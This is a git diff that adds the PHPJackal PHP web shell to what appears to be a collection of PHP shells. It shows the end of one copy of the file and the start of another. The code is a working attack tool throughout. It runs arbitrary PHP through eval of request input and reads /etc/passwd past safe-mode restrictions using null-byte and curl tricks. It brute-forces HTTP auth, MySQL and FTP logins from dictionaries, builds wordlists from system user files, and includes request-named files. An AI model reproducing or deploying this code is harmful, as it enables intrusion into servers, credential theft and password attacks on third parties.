cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>"; +} +function phpevaL(){ +global $t,$hcwd; +if (!empty($_REQUEST['code'])){ +echo "<center><textarea rows=\"10\" cols=\"64\">"; +$code = str_replace("<?php","",$_REQUEST['code']); +$code = str_replace("<?","",$code); +$code = str_replace("?>","",$code); +htmlspecialchars(eval($code)); +echo "</textarea></center><br>"; +} +echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>"; +} +function whoiS(){ +global $t,$hcwd; +if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){ +$server =$_REQUEST['server']; +$domain=$_REQUEST['domain']."\r\n"; +$ser=fsockopen($server,43,$en,$es,5); +fputs($ser,$domain); +echo "<pre>"; +while(!feof($ser))echo fgets($ser); +echo "</pre>"; +fclose($ser); +} +else{ +echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>"; +} +} +function hexvieW(){ +if (!empty($_REQUEST['filE'])){ +$f = $_REQUEST['filE']; +echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>"; +$file = fopen($f,"r"); +$i= -1; +while (!feof($file)) { +$ln=''; +$i++; +echo "<tr><td width=\"10%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>"; +echo "<td width=\"25%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">"; +for ($j=0;$j<=7;$j++){ +if (!feof($file)){ +$tmp = strtoupper(dechex(ord(fgetc($file)))); +if (strlen($tmp)==1) $tmp = "0".$tmp; +echo $tmp." "; +$ln.=$tmp; +} +} +echo "</td><td width=\"25%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">"; +for ($j=7;$j<=14;$j++){ +if (!feof($file)){ +$tmp = strtoupper(dechex(ord(fgetc($file)))); +if (strlen($tmp)==1) $tmp = "0".$tmp; +echo $tmp." "; +$ln.=$tmp; +} +} +echo "</td><td width=\"40%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">"; +$n=0;$asc="";$co=0; +for ($k=0;$k<=16;$k++){ +$co=hexdec(substr($ln,$n,2)); +if (($co<=31)||(($co>=127)&&($co<=160)))$co=46; +$asc.= chr($co); +$n+=2; +} +echo htmlspecialchars($asc); +echo "</td></tr>"; +} +} +fclose($file); +echo "</table>"; +} +function safemodE(){ +global $windows,$t,$hcwd; +if (!empty($_REQUEST['file'])){ +$i=1; +echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n"; +ini_restore("safe_mode");ini_restore("open_basedir"); +$tmp = file_get_contents($_REQUEST['file']); +echo $tmp; +$i++; +echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n"; +$tmp=tempnam("","cx"); +copy("compress.zlib://".$_REQUEST['file'], $tmp); +$fh = fopen($tmp, "r"); +$data = fread($fh, filesize($tmp)); +fclose($fh); +echo $data; +$i++; +if(function_exists("curl_init")){ +echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n"; +$fh = @curl_init("file://".$_REQUEST['file'].""); +$tmp = @curl_exec($fh); +echo $tmp; +$i++; +echo "\n</font><font color=green>Method $i:(curl_init)[B]</font><font color=blue>\n"; +$i++; +if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR)) +$ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__); +else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +} +if($_REQUEST['file'] == "/etc/passwd"){ +echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n"; +for($uid=0;$uid<99999;$uid++){ +$h=posix_getpwuid($uid); +if (!empty($h))foreach($h as $v)echo "$v:";}} +$i++; +echo "</pre></font>"; +} +echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>"; +} +function crackeR(){ +global $et; +$cwd = getcwd(); +echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>"; +} +function dicmakeR(){ +global $errorbox,$windows,$footer,$t,$et,$hcwd; +if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0; +if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ +$min = $_REQUEST['min']; +$max = $_REQUEST['max']; +if($max<$min)die($errorbox ."Bad input!$et". $footer); +$s =$w=""; +$out = $_REQUEST['output']; +$r = ($_REQUEST['range']=='a' )?'a':'A'; +if ($_REQUEST['range']==0) $r=0; +for($i=0;$i<$min;$i++) $s.=$r; +$dic = fopen($out,'a'); +if(is_nan($r)){ +while(strlen($s)<=$max){ +$w = $s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++;} +} +else{ +while(strlen($w)<=$max){ +$w =(string)str_repeat("0",($min - strlen($s))).$s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++;} +} +fclose($dic); +echo "<font color=blue>Done</font>"; +} +if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ +$input=fopen($_REQUEST['input'],'r'); +if (!$input){ +if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>"; +else{ +$input=explode("\n",shelL("cat $input")); +$output=fopen($_REQUEST['output'],'w'); +if ($output){ +foreach ($input as $in){ +$user = $in; +$user = trim(fgets($in)," \n\r"); +if (!strstr($user,":"))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo "<font color=blue>Done</font>"; +} +} +} +else{ +$output=fopen($_REQUEST['output'],'w'); +if ($output){ +while (!feof($input)){ +$user = trim(fgets($input)," \n\r"); +if (!strstr($user,":"))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo "<font color=blue>Done</font>"; +} +else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>"; +} +}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){ +$res=downloadiT($_REQUEST['url'],$_REQUEST['output']); +if($combo && $res){ +$file=file($_REQUEST['output']); +$output=fopen($_REQUEST['output'],'w'); +foreach ($file as $v)fwrite($output,"$v:$v\n"); +fclose($output); +} +echo "<font color=blue>Done</font>"; +}else{ +$temp=whereistmP(); +echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";} +} +function calC(){ +global $t,$et,$hcwd; +$fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode'); +if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){ +echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">"; +if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i}))); +echo "</textarea>$et</center><br>"; +} +echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>"; +} +function authcrackeR(){ +global $errorbox,$et,$t,$crack,$hcwd; +if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$data=''; +$method=($_REQUEST['method'])?'POST':'GET'; +if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} +spliturL($_REQUEST['target'],$host,$page); +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +if($method='GET')$page.=$data; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +echo "<font color=blue>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$so=fsockopen($host,80,$en,$es,5); +if(!$so){echo "$errorbox Can not connect to host$et";break;} +else{ +$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); +if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data); +$packet.="\r\n\r\n"; +$packet.=$data; +fputs($so,$packet); +$res=substr(fgets($so),9,2); +fclose($so); +if($res=='20')echo "U: $user P: $pass</br>"; +flusheR(); +} +} +echo "Done!</font>"; +}else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; +} +function sqlcrackeR(){ +global $errorbox,$t,$et,$crack; +if (!function_exists("mysql_connect")){ +echo "$errorbox Server does n`t support MySQL$et"; +} +else{ +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$sql=@mysql_connect($target,$user,$pass); +if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +else{ +echo "<center>${t}MySQL cracker:$crack"; +} +} +} +function ftpcrackeR(){ +global $errorbox,$t,$et,$crack; +if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et"; +else{ +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;} +if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;} +ftp_close($ftp); +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +else echo "<center>${t}FTP cracker:$crack"; +}} +function openiT($name){ +$ext=strtolower(substr($name,strrpos($name,'.')+1)); +$src=array('php','php3','php4','phps','phtml','phtm','inc'); +if(in_array($ext,$src))highlight_file($name); +else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>"; +} +function logouT(){ +setcookie('passw','',time()-10000); +header('Location: '.hlinK()); +} +?> +<html> +<head> +<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style> +<meta http-equiv="Content-Language" content="en-us"> +<title>PHPJackal</title> +</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC"> +<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%"> +<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table> +<hr size=1 noshade> +<?php +if (!empty($_REQUEST['seC'])){ +switch($_REQUEST['seC']){ +case 'fm':filemanager();break; +case 'sc':scanneR();break; +case 'phpinfo': phpinfo();break; +case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']); +if (!empty($_REQUEST['Save'])){ +$filehandle= fopen($_REQUEST['file'],"w"); +fwrite($filehandle,$_REQUEST['edited']); +fclose($filehandle);} +if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR(''); +break; +case 'openit':openiT($_REQUEST['namE']);break; +case 'cr': crackeR();break; +case 'dic':dicmakeR();break; +case 'whois':whoiS();break; +case 'hex':hexvieW();break; +case 'img':showimagE($_REQUEST['filE']);break; +case 'inc':include ($_REQUEST['filE']);break; +case 'hc':hashcrackeR();break; +case 'fcr':formcrackeR();break; +case 'snmp':snmpcrackeR();break; +case 'sql':sqlcrackeR();break; +case 'auth':authcrackeR();break; +case 'pop3':pop3crackeR();break; +case 'imap':imapcrackeR();break; +case 'smtp':smtpcrackeR();break; +case 'ftp':ftpcrackeR();break; +case 'eval':phpevaL();break; +case 'px':pr0xy();break; +case 'webshell':webshelL();break; +case 'mailer':maileR();break; +case 'br':brshelL();break; +case 'asm':safemodE();break; +case 'mysql':mysqlclienT();break; +case 'calc':calC();break; +case 'sysinfo':sysinfO();break; +case 'checksum':checksuM($_REQUEST['filE']);break; +case 'logout':logouT();break; +default: echo $intro; +}}else echo $intro; +echo $footer;?></body></html> \ No newline at end of file diff --git a/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.jpg b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.jpg new file mode 100644 index 0000000..ad1d5e3 Binary files /dev/null and b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.jpg differ diff --git a/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.php b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.php new file mode 100644 index 0000000..87862ba --- /dev/null +++ b/php/PHPshell/م€گPHPJackalم€‘/PHPJackal.php @@ -0,0 +1,1582 @@ +<?php +#--Config--# +$login_password=''; +#----------# +error_reporting(E_ALL); +ignore_user_abort(true); +set_time_limit(0); +ini_set('max_execution_time','0'); +ini_set('memory_limit','9999M'); +ini_set('output_buffering',0); +set_magic_quotes_runtime(0); +if(!isset($_SERVER))$_SERVER=&$HTTP_SERVER_VARS; +if(!isset($_POST))$_POST=&$HTTP_POST_VARS; +if(!isset($_GET))$_GET=&$HTTP_GET_VARS; +if(!isset($_COOKIE))$_COOKIE=&$HTTP_COOKIE_VARS; +if(!isset($_FILES))$_FILES=&$HTTP_POST_FILES; +$_REQUEST = array_merge($_GET,$_POST); +if(get_magic_quotes_gpc()){ +foreach($_REQUEST as $key=>$value)$_REQUEST[$key]=stripslashes($value); +} +function hlinK($str=''){ +$myvars=array('modE','chmoD','workingdiR','urL','cracK','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); +$ret=$_SERVER['PHP_SELF'].'?'; +$new=explode('&',$str); +foreach($_GET as $key => $v){ +$add=1; +foreach($new as $m){ +$el=explode('=',$m); +if($el[0]==$key)$add=0; +} +if($add){if(!in_array($key,$myvars))$ret.="$key=$v&";} +} +$ret.=$str; +return $ret; +} +$et='</td></tr></table>'; +if(!empty($login_password)){ +if(!empty($_REQUEST['fpassw'])){ +if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw'])); +header('Location: '.hlinK()); +} +if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></form>$et</body></html>"); +} +if(!empty($_REQUEST['workingdiR']))chdir($_REQUEST['workingdiR']); +$disablefunctions=ini_get('disable_functions'); +$disablefunctions=explode(',',$disablefunctions); +function checkthisporT($ip,$port,$timeout,$type=0){ +if(!$type){ +$scan=fsockopen($ip,$port,$n,$s,$timeout); +if($scan){fclose($scan);return 1;} +} +elseif(function_exists('socket_set_timeout')){ +$scan=fsockopen("udp://$ip",$port); +if($scan){ +socket_set_timeout($scan,$timeout); +fwrite($scan,"\x00"); +$s=time(); +fread($scan,1); +if((time()-$s)>=$timeout){fclose($scan);return 1;} +} +} +return 0; +} +if(!function_exists('file_get_contents')){ +function file_get_contents($addr){ +$a=fopen($addr,'r'); +$tmp=fread($a,filesize($a)); +fclose($a); +if($a)return $tmp;else return null; +} +} +if(!function_exists('file_put_contents')){ +function file_put_contents($addr,$con){ +$a=fopen($addr,'w'); +if(!$a)return 0; +$t=fwrite($a,$con); +fclose($a); +if($t)return strlen($con); +return 0; +} +} +function file_add_contentS($addr,$con){ +$a=fopen($addr,'a'); +if(!$a)return 0; +fwrite($a,$con); +fclose($a); +return strlen($con); +} +if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']); +if(!empty($_REQUEST['downloaD'])){ +ob_clean(); +$dl=$_REQUEST['downloaD']; +$con=file_get_contents($dl); +header('Content-type: application/octet-stream'); +header("Content-disposition: attachment; filename=\"$dl\";"); +header('Content-length: '.strlen($con)); +echo $con; +exit; +} +if(!empty($_REQUEST['imagE'])){ +$img=$_REQUEST['imagE']; +header('Content-type: imagE/gif'); +header("Content-length: ".filesize($img)); +header("Last-Modified: ".date('r',filemtime($img))); +echo file_get_contents($img); +exit; +} +if(!empty($_REQUEST['exT'])){ +$ex=$_REQUEST['exT']; +$e=get_extension_funcs($ex); +echo '<html><head><title>'.htmlspecialchars($ex).'</title></head><body><b>Functions:</b><br>';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo '<font color=red>DISABLED</font>';echo '<br>';} +echo '</body></html>'; +exit; +} +header('Cache-Control: no-cache, must-revalidate'); +header('Expires: Mon, 7 Aug 1987 05:00:00 GMT'); +function showsizE($size){ +if($size>=1073741824)$size=round(($size/1073741824),2).' GB'; +elseif($size>=1048576)$size=round(($size/1048576),2).' MB'; +elseif($size>=1024)$size=round(($size/1024),2).' KB'; +else $size.=' B'; +return $size; +} +$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0; +$errorbox="<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td><b>Error: </b>"; +$v='1.9'; +$cwd=getcwd(); +$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td align='center'>"; +$intro="<center><table border=0 style='border-collapse: collapse'><tr><td bgcolor='#666666'><b>Script:</b><br>".str_repeat('-=-',25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat('-=-',25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href='http://netjackal.by.ru/' target='_blank'>http://netjackal.by.ru/</a><br><b>Email:</b> <a href='mailto:nima_501@yahoo.com?subject=PHPJackal'>nima_501@yahoo.com</a><br><noscript>".str_repeat('-=-',25)."<br><b>Error: Enable JavaScript in your 